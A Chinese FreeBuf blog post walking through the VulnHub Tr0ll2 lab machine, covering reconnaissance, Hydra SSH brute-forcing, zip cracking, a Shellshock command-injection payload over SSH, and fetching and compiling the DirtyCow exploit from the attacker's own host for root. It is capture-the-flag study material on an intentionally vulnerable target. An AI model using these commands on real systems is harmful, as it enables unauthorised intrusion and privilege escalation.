freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Troll2打靶思路详解(vulnhub)
CMing 2024-03-02 16:50:05 24429

Troll2打靶思路详解(vulnhub)

第一步:信息收集--主机发现和端口扫描

使用nmap快速对局域网进行扫描来确定靶机IP

nmap -sn 192.168.31.0/24

确定靶机IP为192.168.31.72

再次使用nmap对靶机IP进行详细扫描

nmap -p- -sV -sT -O 192.168.31.72

结果如下

image

首先对80端口所开放的web服务进行信息收集

查看web服务访问http://192.168.31.72/

image

还是熟悉的图片...

通过dirb进行目录扫描

dirb http://192.168.31.72/

结果如下

image

访问http://192.168.31.72/robots.txt

image

我的天呐,这么多那就把robots.txt下载下来

wget http://192.168.31.72/robots.txt

通过python脚本批量查看一下那些网址可以访问

image

可以看到 /noob /keep_trying /dont_bother /ok_this_is_it 这几个网址可以访问,那就用浏览器查看一下,发现都是以下这个图片

image

完了,又被狗作者嘲讽了

然后对21端口所开放的ftp服务进行信息收集

通过ftp 192.168.31.72命令来访问

有了上一个靶机的经验,我尝试anonymous(匿名用户)进行登入,发现根本不行

image

最后对22端口所开放的ssh服务进行信息收集

还是尝试用Hydra进行弱口令爆破

hydra -L user.txt -P CommonWebAdminPass.txt -t 2 -vV -e ns 192.168.31.69 ssh

并没有什么发现

第二步:猜测与破解

进行到这里我的思路已经断了

我重新开始查看收集到的信息

在尝试连接ftp的返回信息中

220 Welcome to Tr0ll FTP... Only noobs stay for a while...

发现这里是“Tr0ll”,而不是”Troll"。我承认这里有些运气的存在

但是他ftp的账号和密码都是Tr0ll

所以接下来就是登入,查看,下载

image

发现是zip文件,解压一下

image

你妹的,有密码

第三步:WEB到杂项

已经进行到现在这个地步了,web上还是没有什么收获,我尝试用更大的字典进行扫描,还是没有结果,突然间想到有没有可能藏在图片里了,说干就干

下载

wget http://192.168.31.72/tr0ll_again.jpg

wget http://192.168.31.72/noob/cat_the_troll.jpg

wget http://192.168.31.72/keep_trying/cat_the_troll.jpg

wget http://192.168.31.72/dont_bother/cat_the_troll.jpg

wget http://192.168.31.72/ok_this_is_it/cat_the_troll.jpg

查看

strings tr0ll_again.jpg

strings cat_the_troll.jpg

最后在“http://192.168.31.72/dont_bother/cat_the_troll.jpg”这个图片里发现了以下信息

image

Look Deep within y0ur_self for the answer

翻译:
在y0ur_self深处寻找答案

所以访问

image

将answer.txt下载下来

wget http://192.168.31.72/y0ur_self/answer.txt

第四步:ZIP爆破

查看

image

看一下格式几乎可以确定是用base64算法加密的

那就解密

base64 -d answer.txt > password.txt

然后使用fcrackzip暴力破解

fcrackzip -u -D -p password.txt lmao.zip

image

得到了密码”ItCantReallyBeThisEasyRightLOL“,解压并查看zip文件

image

发现是ssh的key文件!这可太棒了!!!

第五步:后渗透--SSH登入与提权

ssh登入

ssh -i noob noob@192.168.31.72

image

发现报了个错误,我查询资料发现是SHA-1算法不安全,新版本的openssh已经禁用了,临时解决方法加上-o PubkeyAcceptedKeyTypes=+ssh-rsa参数。

所以使用以下命令连接

ssh -i noob noob@192.168.31.72 -o PubkeyAcceptedKeyTypes=+ssh-rsa

image

狗作者告诉我

TRY HARDER LOL!

翻译:
更努力,哈哈

经过查询资料发现可以通过利用shellshock漏洞来获取会话

(shellshock漏洞原理较为复杂,感兴趣的同学可以去看看)

所以playload如下

ssh -i noob noob@192.168.31.72 -o PubkeyAcceptedKeyTypes=+ssh-rsa '() { :;}; /bin/bash'

然后还是通过python来增加shell的交互性

python -c "import pty;pty.spawn('/bin/bash')"

image

提权

查看当前用户权限

id

sudo -l

image

可以看出只是普通用户的权限

直接查看内核和gcc版本,看看能不能使用脏牛进行提权

脏牛链接https://github.com/FireFart/dirtycow

image

感觉差不多,那就冲

本地python启动http服务

image

使用wget命令下载靶机

wget http://192.168.31.213:8000/dirty.c

编译,执行

gcc -pthread dirty.c -o dirty -lcrypt

./dirty my-new-password

image
成功了,登入firefart用户,恢复“/etc/passwd!”

su firefart

mv /tmp/passwd.bak /etc/passwd

看一下权限

id

image

可以看到已经是root权限了

最后就是拿flag了

image

至此完结,撒花。

# 网络安全
本文为 CMing 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
CMing LV.4
这家伙太懒了,还未填写个人描述!
  • 9 文章数
  • 2 关注者
DC-3打靶思路详解(vulnhub)
2024-03-30
DC-2打靶思路详解(vulnhub)
2024-03-26
DC-1打靶思路详解(vulnhub)
2024-03-19
文章目录